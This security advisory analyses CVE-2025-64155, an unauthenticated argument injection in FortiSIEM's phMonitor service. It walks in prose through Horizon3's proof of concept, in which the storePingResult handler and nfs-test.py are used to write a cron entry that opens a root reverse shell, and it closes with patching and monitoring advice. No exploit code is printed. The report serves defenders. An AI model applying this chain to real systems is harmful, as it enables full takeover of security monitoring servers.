CVE-2025-64155: Unauthenticated Argument Injection in Fortinet FortiSIEM Leading to Remote Code Execution
Executive Summary
CVE-2025-64155 is a critical vulnerability in Fortinet FortiSIEM that enables unauthenticated remote attackers to achieve arbitrary code execution through an argument injection flaw in the phMonitor service. Discovered by researchers at Horizon3, the vulnerability leverages a combination of unauthenticated access to command handlers, improper input handling, script execution, and file overwrite capabilities to gain initial code execution as the admin user, followed by escalation to root privileges via cron job manipulation.
On January 14, 2026, Horizon3 released a comprehensive technical writeup and a proof-of-concept (PoC) exploit on GitHub. The PoC demonstrates the full exploitation chain in a practical manner. This report incorporates an independent recreation and step-by-step breakdown of the Horizon3 PoC, explaining the underlying mechanics of the code execution and vulnerability exploitation.
Given the ease of exploitation and the historical targeting of Fortinet products with 64 CVEs on CISA KEV, immediate patching is strongly recommended.
Background
FortiSIEM serves as Fortinet's Security Information and Event Management solution, providing log collection, correlation, automated response, and remediation capabilities. The platform processes security events across enterprise environments, making it a high-value target for attackers seeking to compromise security monitoring infrastructure.
Previous vulnerabilities in phMonitor, such as CVE-2024-23108 and CVE-2023-34992, have exposed similar unauthenticated command injection paths. This pattern suggests systemic issues in input validation and authentication controls within the phMonitor service architecture.
Vulnerability Details
The core issue lies in the phMonitor service's handling of HTTP requests. The service exposes multiple command handlers that process incoming requests without requiring authentication. When combined with insufficient input sanitization, attackers can inject arbitrary arguments into system commands.
The exploitation chain proceeds through several stages. First, an attacker sends a crafted HTTP request to the phMonitor service on port 7900. The request targets a command handler that accepts user-controlled input. Due to improper argument handling, the attacker can inject additional parameters that modify the command's behavior.
The specific vulnerability allows attackers to write arbitrary content to arbitrary file locations on the system. By targeting cron directories or other system configuration files, attackers can achieve code execution. The initial execution context runs as the admin user, which has sufficient privileges to modify system cron jobs.
Technical Analysis
The phMonitor service implements a custom HTTP server that routes requests to various command handlers. Analysis of the binary reveals that several handlers accept parameters directly from HTTP request bodies without validation.
The vulnerable code path involves the storePingResult handler, which processes network monitoring data. The handler extracts parameters from the request and passes them to internal functions that ultimately execute system commands. By injecting shell metacharacters or additional arguments, attackers can redirect output to arbitrary files.
The exploitation technique leverages the nfs-test.py script, which the phMonitor service can invoke. By manipulating the arguments passed to this script, attackers can write attacker-controlled content to the cron.d directory, scheduling malicious commands for execution.
Proof of Concept Breakdown
The Horizon3 PoC demonstrates the complete exploitation chain:
- The exploit sends an HTTP POST request to port 7900 targeting the vulnerable handler
- The request body contains crafted parameters that exploit the argument injection flaw
- The injected arguments cause the system to write a malicious cron entry
- The cron daemon executes the attacker's payload within one minute
- The payload establishes a reverse shell or executes arbitrary commands as root
The PoC achieves root access by writing to /etc/cron.d/, where files are automatically parsed by the cron daemon. The written file contains a schedule entry that executes a reverse shell command, providing the attacker with interactive root access to the compromised system.
Impact Assessment
The vulnerability carries a CVSS score of 10.0 (Critical), reflecting the combination of:
- Network-based attack vector requiring no authentication
- Low attack complexity with no user interaction required
- Complete compromise of confidentiality, integrity, and availability
- Potential for lateral movement within enterprise environments
Organizations running vulnerable FortiSIEM versions face risk of complete security monitoring infrastructure compromise, potentially allowing attackers to operate undetected while manipulating security event data.
Mitigation
Fortinet has released patches addressing this vulnerability. Organizations should immediately update to FortiSIEM version 7.1.3 or later. Where immediate patching is not possible, network segmentation should restrict access to the phMonitor service port (7900) to only authorized management systems.
Additional defensive measures include monitoring for unusual cron job modifications, implementing egress filtering to detect reverse shell connections, and reviewing FortiSIEM logs for evidence of exploitation attempts.